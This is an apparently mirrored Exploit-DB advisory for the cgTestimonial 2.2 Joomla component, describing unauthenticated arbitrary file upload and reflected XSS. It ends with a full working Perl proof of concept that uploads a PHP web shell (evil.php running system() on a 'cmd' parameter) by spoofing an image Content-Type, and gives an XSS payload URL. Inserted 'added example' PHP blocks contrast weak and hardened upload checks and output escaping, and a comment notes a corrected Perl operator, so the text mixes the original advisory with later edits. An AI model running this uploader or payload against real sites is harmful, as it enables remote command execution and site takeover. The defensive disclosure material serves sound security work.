Joomla! Component com_cgtestimonial 2.2 – Multiple Vulnerabilities

  • Author: Salvatore Fresta
    Date: 2010-08-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/14569/
  • cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities
    
     Name              cgTestimonial
     Vendor            http://www.cmsgalaxy.com
     Versions Affected 2.2
    
     Author            Salvatore Fresta aka Drosophila
     Website           http://www.salvatorefresta.net
     Contact           salvatorefresta [at] gmail [dot] com
     Date              2010-08-06
    
    X. INDEX
    
     I.   ABOUT THE APPLICATION
     II.  DESCRIPTION
     III. ANALYSIS
     IV.  SAMPLE CODE
     V.   FIX
     
    
    I. ABOUT THE APPLICATION
    ________________________
    
    The cg_Testimonial component is a tool for adding testimonials
    submitted by users from the frontend, and for managing and
    publishing testimonials from the backend. This Joomla extension
    lets website users submit a testimonial form with several
    fields on one of your site's pages, and enables adding
    testimonials by either users or the administrator.
    
    
    II. DESCRIPTION
    _______________
    
    Some parameters are not properly sanitised. The following
    vulnerabilities can be exploited by unauthenticated (guest) users.
    
    
    III. ANALYSIS
    _____________
    
    Summary:
    
     A) Multiple Arbitrary File Upload
     B) XSS
     
    
    A) Multiple Arbitrary File Upload
    _________________________________
    
    The usr_img parameter in cgtestimonial.php (frontend) and in
    testimonial.php (admin, where no check at all is made) is not
    properly sanitised. On the frontend the only check is on the
    Content-Type field of the uploaded part, a value the client
    supplies, so a PHP file declared as image/jpeg is accepted.
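    The advisory does not include the component's upload code, so the
    following is an added example (not cgTestimonial's own code) of the
    weak check it describes beside a hardened replacement. The function
    names, the size limit and the storage directory are assumptions; the
    input shape is a single $_FILES entry such as $_FILES['usr_img'].

```php
<?php
// Added example, not part of the cgTestimonial component. Shows why a
// Content-Type-only check fails and what a server-side check should do instead.
// Function names, MAX_IMAGE_BYTES and the storage path are hypothetical.

declare(strict_types=1);

const MAX_IMAGE_BYTES = 512 * 1024;
// Allowed extensions, each mapped to the MIME type the file's real bytes must have.
const ALLOWED_IMAGE_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

// The weak pattern the advisory describes: $file['type'] is copied straight
// from the Content-Type the browser put in the multipart part, so any client
// can declare evil.php to be image/jpeg and pass.
function weak_check(array $file): bool
{
    return $file['type'] === 'image/jpeg';
}

// Hardened check. $file is one $_FILES entry. Returns [true, ''] on success or
// [false, reason]. Nothing the client controls (name, type) decides the outcome alone.
function validate_testimonial_image(array $file): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'upload error ' . (string) $file['error']];
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return [false, 'not a file uploaded via HTTP POST'];
    }
    if ($file['size'] > MAX_IMAGE_BYTES) {
        return [false, 'file too large'];
    }
    // The extension comes from the client-supplied filename: allowlist it, but do not trust it.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_IMAGE_TYPES)) {
        return [false, "extension '$ext' not allowed"];
    }
    // Sniff the actual content: magic bytes via finfo, then require a decodable image.
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $realMime = $finfo->file($file['tmp_name']);
    if ($realMime !== ALLOWED_IMAGE_TYPES[$ext]) {
        return [false, "content is " . (string) $realMime . ", not " . ALLOWED_IMAGE_TYPES[$ext]];
    }
    if (@getimagesize($file['tmp_name']) === false) {
        return [false, 'content does not decode as an image'];
    }
    return [true, ''];
}

// Store under a server-generated name so the client never chooses the path or the
// extension. $dir should be outside the web root, or a directory where the web
// server is configured not to execute PHP.
function store_testimonial_image(array $file, string $dir): string
{
    [$ok, $reason] = validate_testimonial_image($file);
    if (!$ok) {
        throw new RuntimeException('rejected upload: ' . $reason);
    }
    $ext  = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not move uploaded file');
    }
    return $name;
}

// Hypothetical call from the form handler:
// $stored = store_testimonial_image($_FILES['usr_img'], '/var/www/data/testimonial_images');
```

    The PoC later fetches the uploaded file from
    components/com_cgtestimonial/user_images/, a directory inside the web
    root where the server executes PHP; even with the validation above,
    denying script execution in that directory (or moving uploads out of
    the document root) removes the remote-shell outcome entirely.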
    
    
    B) XSS
    ______
    
    The url parameter in video.php is not properly sanitised
    before being printed on screen.
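    The advisory only names the parameter, not the markup video.php emits,
    so this is an added example (not the component's video.php) of the
    reflected-XSS pattern beside a hardened version. The embed markup and the
    function names are assumptions.

```php
<?php
// Added example, not the component's own code. The unsafe function reproduces the
// pattern the advisory describes (query parameter echoed unescaped into markup);
// the safe one validates and encodes it. The embed markup is hypothetical.

declare(strict_types=1);

// Vulnerable pattern: the raw url value lands inside an attribute, so a value that
// starts with "> closes the attribute and the tag and injects new elements.
function render_video_unsafe(string $url): string
{
    return '<embed src="' . $url . '" type="application/x-shockwave-flash">';
}

// Hardened: first require a syntactically valid http(s) URL, then encode for the
// HTML attribute context. Encoding alone stops quote-breaking; the scheme check
// additionally rejects javascript: and data: values that would encode cleanly.
function render_video_safe(string $url): string
{
    $valid = filter_var($url, FILTER_VALIDATE_URL);
    if ($valid === false) {
        return '<p>Invalid video URL.</p>';
    }
    $scheme = strtolower((string) parse_url($valid, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '<p>Invalid video URL.</p>';
    }
    $escaped = htmlspecialchars($valid, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<embed src="' . $escaped . '" type="application/x-shockwave-flash">';
}

// Constructed inputs: the advisory's payload shape and an ordinary URL.
$payload = '"><script>alert(\'xss\');</script>';
echo render_video_unsafe($payload), "\n";                          // script tag reaches the page
echo render_video_safe($payload), "\n";                            // rejected: not a URL
echo render_video_safe('https://example.com/video?id=1&autoplay=1'), "\n"; // & becomes &amp;
```

    The same two steps apply to every place the component prints request
    data: validate against the shape the value is supposed to have, then
    encode for the context (attribute, element body, URL) it is written into.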
    
    
    IV. SAMPLE CODE
    _______________
    
    A) Multiple Arbitrary File Upload
    
    http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt
    
    B) XSS
    
    http://site/path/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
    
    
    V. FIX
    ______
    
    No fix.
    
    ################################ PoC-cgTestimonial2.2.pl ################################
    
    #!/usr/bin/perl
    #
    # PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component
    #
    # Author: Salvatore Fresta aka Drosophila
    # Email: salvatorefresta@gmail.com
    #
    # Date: 06 August 2010
    #
    # http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command
    #
    
    use strict;
    use warnings;
    use IO::Socket;
    
    
    my $usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n".
     "http://www.salvatorefresta.net\n\n".
     "Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n";
    
    $#ARGV == 1 || die $usage;
    
    my $host = $ARGV[0];
    my $path = $ARGV[1];
    
    my $stop = 0;
    my $rand = "master".int(rand 150);
    my $shell = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>";
    my $filename = "evil.php";
    
    my $code= "--AaB03x\r\n".
    "Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n".
    "Content-Type: image/jpeg\r\n".
    "\r\n".
    "$shell\r\n".
    "--AaB03x--";
    
    my $pkg = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n".
    "Host: $host\r\n".
    "Content-Type: multipart/form-data; boundary=AaB03x\r\n".
    "Content-Length: " .length($code). "\r\n".
    "\r\n".
    $code;
    
    my $socket = new IO::Socket::INET( Proto=> "tcp",
     PeerAddr=> $host,
     PeerPort=> "80"
    ) or die "\n[-] Unable to connect to $host\n\n";
    
    print "\n[+] Connected\n";
    print $socket $pkg;
    
    $pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1\r\n".
     "Host: $host\r\n\r\n";
    
    print $socket $pkg;
    
    # Read the response line by line; stop at the first line that is not a 302 redirect.
    # The original used "!=~", which is not a Perl operator; the negated match is "!~".
    while ((my $rec = <$socket>) && $stop != 1) {
        if ($rec !~ /302 Found/) {
            $stop = 1;
        }
    }
    
    if ($stop != 1) {
        print "[-] Shell not uploaded\n";
        close($socket);
        exit;
    }
    
    print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."\n".
    "[+] Disconnected\n\n";
    
    close($socket);